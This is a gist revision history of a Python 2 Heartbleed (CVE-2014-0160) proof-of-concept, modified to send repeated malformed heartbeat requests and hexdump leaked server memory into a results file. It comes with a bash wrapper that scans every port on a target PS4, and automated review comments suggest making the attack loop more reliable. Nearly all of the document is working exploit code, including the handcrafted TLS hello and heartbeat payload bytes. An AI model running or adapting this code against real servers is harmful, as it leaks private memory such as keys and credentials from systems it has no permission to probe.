wargio revised this gist
Apr 16, 2014 . 2 changed files with 37 additions and 3 deletions.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -0,0 +1,25 @@ #!/bin/bash PORT_FOUND="0" PORT=0 if [ $# -eq 1 ]; then echo "I'm testing the port" for port in `seq 1 65535`; do echo "port=" $port ./hb-test.py $1 -p $port -P >> /dev/null if [ $? -eq 0 ]; then PORT_FOUND="1"; echo "PS4 port found! port= $port"; PORT=$port break; fi done if [ $PORT_FOUND -eq 0 ]; then echo "PS4 port not found! Something may went wrong..." else echo "I'll test the Heartbleed bug. (see the result.txt file)" ./hb-test.py $1 -p $PORT -t 1 >> result.txt fi else echo "hb-ps4 <IP PS4>" fi This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -18,6 +18,7 @@ options.add_option('-d', '--debug', action='store_true', default=False, help='Enable debug output') options.add_option('-t', '--times', type='int', default=201, help='Times to perform the attack [default: 200]') options.add_option('-w', '--wait', type='int', default=1, help='Seconds to wait betweens heartbleeds attacks [default: 1]') options.add_option('-P', '--test', action='store_true', default=False, help='Test if the port works') def h2bin(x): return x.replace(' ', '').replace('\n', '').decode('hex') 
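Review bot: The positional argument and loop variable are expanded unquoted in `./hb-test.py $1 -p $port -P`, so an address containing whitespace or glob characters is split before it reaches the script; write `./hb-test.py "$1" -p "$port" -P >/dev/null` (and the same for the later `-t 1` call). The "found" decision is only the exit status of hb-test.py, and in the companion script the `-P` path returns right after a successful `connect`, so as far as this page shows the loop stops at the first TCP port that accepts a connection, not at one that speaks TLS — the `echo "PS4 port found!"` message overstates what was checked. The message `"PS4 port not found! Something may went wrong..."` should read `"PS4 port not found! Something may have gone wrong..."`. Results are appended to result.txt with `>>`, so output from earlier runs is never cleared; a comment or a truncating `>` would make that explicit.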
@@ -110,12 +111,20 @@ def main(): opts, args = options.parse_args() if len(args) < 1: options.print_help() return 1 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) print 'Connecting...' sys.stdout.flush() try: s.connect((args[0], opts.port)) except Exception, e: print 'Connection failed. Port or Address Wrong' sys.exit(1) if opts.test: s.close() return if opts.starttls: re = s.recv(4096) @@ -166,7 +175,7 @@ def main(): hb_res = hit_hb(s) s.close() print 'Ending.' if __name__ == '__main__': main() -
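Review bot: `main()` returns 1 on a missing server argument, but the guard at the bottom of the file calls `main()` bare, so the process still exits with status 0; since hb-ps4 drives this script purely by exit status, change the guard to `if __name__ == '__main__': sys.exit(main())`. In the new `except Exception, e:` block the caught exception is bound but never shown, which hides the real reason (refused, timed out, name resolution) behind the generic 'Connection failed' text; `print 'Connection failed: %s' % e` before `sys.exit(1)` keeps the same exit code and adds the diagnosis. The `if opts.test:` early return also leaves the socket closed via `s.close()`, which is correct, but a one-line comment such as `# -P: only verify the TCP port accepts a connection, then exit 0` would document the contract hb-ps4 relies on. The enclosing `main` continues outside this hunk.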
wargio revised this gist
Apr 16, 2014 . 1 changed file with 7 additions and 5 deletions.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -2,6 +2,7 @@ # Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org) # The author disclaims copyright to this source code. # edited by Giovanni Dante Grazioli (wargio@libero.it) import sys import struct @@ -11,11 +12,12 @@ import re from optparse import OptionParser options = OptionParser(usage='%prog server [options]', description='Test/Attack for SSL heartbeat vulnerability (CVE-2014-0160)') options.add_option('-p', '--port', type='int', default=443, help='TCP port to test [default: 443]') options.add_option('-s', '--starttls', action='store_true', default=False, help='Check STARTTLS') options.add_option('-d', '--debug', action='store_true', default=False, help='Enable debug output') options.add_option('-t', '--times', type='int', default=201, help='Times to perform the attack [default: 200]') options.add_option('-w', '--wait', type='int', default=1, help='Seconds to wait betweens heartbleeds attacks [default: 1]') def h2bin(x): return x.replace(' ', '').replace('\n', '').decode('hex') @@ -143,8 +145,8 @@ def main(): hb_res = hit_hb(s) s.close() if hb_res == False: return time.sleep(opts.wait) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((args[0], opts.port)) s.send(hello) -
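Review bot: The `-t` option declares `default=201` while its help text says `[default: 200]`; the later `times = opts.times - 1` in `main` appears to be why the two differ by one, but nothing in the code says so, so either make the values agree or add `# the loop runs opts.times - 1 iterations; the final heartbeat after the loop makes up the difference` next to the option. The `-w` help string has a typo: `help='Seconds to wait between heartbeat requests [default: 1]'`. In the third hunk `if hb_res == False:` compares against a boolean literal; `hit_hb` returns `True`/`False` in the visible code, so `if not hb_res:` is the idiomatic form and matches how the file tests other conditions. That hunk's `main` starts and ends outside the visible lines.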
wargio revised this gist
Apr 16, 2014 . 1 changed file with 31 additions and 13 deletions.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -15,6 +15,7 @@ options.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)') options.add_option('-s', '--starttls', action='store_true', default=False, help='Check STARTTLS') options.add_option('-d', '--debug', action='store_true', default=False, help='Enable debug output') options.add_option('-t', '--times', type='int', default=201, help='Times to perform the attack') def h2bin(x): return x.replace(' ', '').replace('\n', '').decode('hex') @@ -93,9 +94,7 @@ def hit_hb(s): if typ == 24: print 'Received heartbeat response:' hexdump(pay) if len(pay) <= 3: print 'Server processed malformed heartbeat, but did not return any extra data.' return True @@ -134,19 +133,38 @@ def main(): s.send(hello) print 'Waiting for Server Hello...' sys.stdout.flush() times = opts.times - 1 if times < 0: times = 0 for b in xrange(0, times, 1): print 'Sending heartbeat request...' sys.stdout.flush() s.send(hb) hb_res = hit_hb(s) s.close() if hb_res == False: break time.sleep(1) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((args[0], opts.port)) s.send(hello) while True: typ, ver, pay = recvmsg(s) if typ == None: print 'Server closed connection without sending Server Hello.' s.close() s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((args[0], opts.port)) s.send(hello) if typ == 22 and ord(pay[0]) == 0x0E: break print 'Sending heartbeat request...' sys.stdout.flush() s.send(hb) hb_res = hit_hb(s) s.close() print 'Ending.' if __name__ == '__main__': main() -
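Review bot: The new `if typ == None:` branch inside the second `while True` in `main` closes the socket, reconnects and resends `hello` with no bound on retries, so a server that closes the connection right after the Client Hello keeps the script looping indefinitely instead of reporting failure as the original `return` did; keep a retry counter and fall back to the original 'Server closed connection without sending Server Hello.' exit once it is exhausted. The same line should use `if typ is None:` as `recvmsg` and `hit_hb` already do. Each loop iteration also does `s.send(hb)` immediately before `hit_hb(s)`, and `hit_hb` itself begins with `s.send(hb)`, so two heartbeat records are written per iteration while the log says one; drop the outer send or document the duplication. `main` starts before this hunk.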
takeshixx created this gist
Apr 8, 2014 .
@@ -0,0 +1,152 @@ #!/usr/bin/env python2 # Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org) # The author disclaims copyright to this source code. import sys import struct import socket import time import select import re from optparse import OptionParser options = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)') options.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)') options.add_option('-s', '--starttls', action='store_true', default=False, help='Check STARTTLS') options.add_option('-d', '--debug', action='store_true', default=False, help='Enable debug output') def h2bin(x): return x.replace(' ', '').replace('\n', '').decode('hex') hello = h2bin(''' 16 03 02 00 dc 01 00 00 d8 03 02 53 43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf bd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00 00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88 00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c c0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09 c0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44 c0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c c0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11 00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04 03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19 00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08 00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13 00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00 00 0f 00 01 01 ''') hb = h2bin(''' 18 03 02 00 03 01 40 00 ''') def hexdump(s): for b in xrange(0, len(s), 16): lin = [c for c in s[b : b + 16]] hxdat = ' '.join('%02X' % ord(c) for c in lin) pdat = ''.join((c if 32 <= ord(c) <= 126 else '.' 
)for c in lin) print ' %04x: %-48s %s' % (b, hxdat, pdat) print def recvall(s, length, timeout=5): endtime = time.time() + timeout rdata = '' remain = length while remain > 0: rtime = endtime - time.time() if rtime < 0: return None r, w, e = select.select([s], [], [], 5) if s in r: data = s.recv(remain) # EOF? if not data: return None rdata += data remain -= len(data) return rdata def recvmsg(s): hdr = recvall(s, 5) if hdr is None: print 'Unexpected EOF receiving record header - server closed connection' return None, None, None typ, ver, ln = struct.unpack('>BHH', hdr) pay = recvall(s, ln, 10) if pay is None: print 'Unexpected EOF receiving record payload - server closed connection' return None, None, None print ' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay)) return typ, ver, pay def hit_hb(s): s.send(hb) while True: typ, ver, pay = recvmsg(s) if typ is None: print 'No heartbeat response received, server likely not vulnerable' return False if typ == 24: print 'Received heartbeat response:' hexdump(pay) if len(pay) > 3: print 'WARNING: server returned more data than it should - server is vulnerable!' else: print 'Server processed malformed heartbeat, but did not return any extra data.' return True if typ == 21: print 'Received alert:' hexdump(pay) print 'Server returned error, likely not vulnerable' return False def main(): opts, args = options.parse_args() if len(args) < 1: options.print_help() return s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) print 'Connecting...' sys.stdout.flush() s.connect((args[0], opts.port)) if opts.starttls: re = s.recv(4096) if opts.debug: print re s.send('ehlo starttlstest\n') re = s.recv(1024) if opts.debug: print re if not 'STARTTLS' in re: if opts.debug: print re print 'STARTTLS not supported...' sys.exit(0) s.send('starttls\n') re = s.recv(1024) print 'Sending Client Hello...' sys.stdout.flush() s.send(hello) print 'Waiting for Server Hello...' 
sys.stdout.flush() while True: typ, ver, pay = recvmsg(s) if typ == None: print 'Server closed connection without sending Server Hello.' return # Look for server hello done message. if typ == 22 and ord(pay[0]) == 0x0E: break print 'Sending heartbeat request...' sys.stdout.flush() s.send(hb) hit_hb(s) if __name__ == '__main__': main()
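Review bot: `recvall` computes the remaining time as `rtime` but then waits with a fixed `select.select([s], [], [], 5)`, so the overall `timeout` is only enforced between reads and a single wait can overrun the deadline by up to five seconds; pass the remaining budget instead, `r, w, e = select.select([s], [], [], rtime)`. In the STARTTLS path of `main`, `re = s.recv(4096)` rebinds the name of the `re` module imported at the top of the file, which is confusing even though `re` is otherwise unused here; rename the local to `resp`. `main` also tests `if typ == None:` where `recvmsg` and `hit_hb` use `is None`; use the identity check consistently. When `len(args) < 1` the function returns without a value and the `__main__` guard ignores it, so a usage error exits 0; `sys.exit(main())` with `return 1` would surface it.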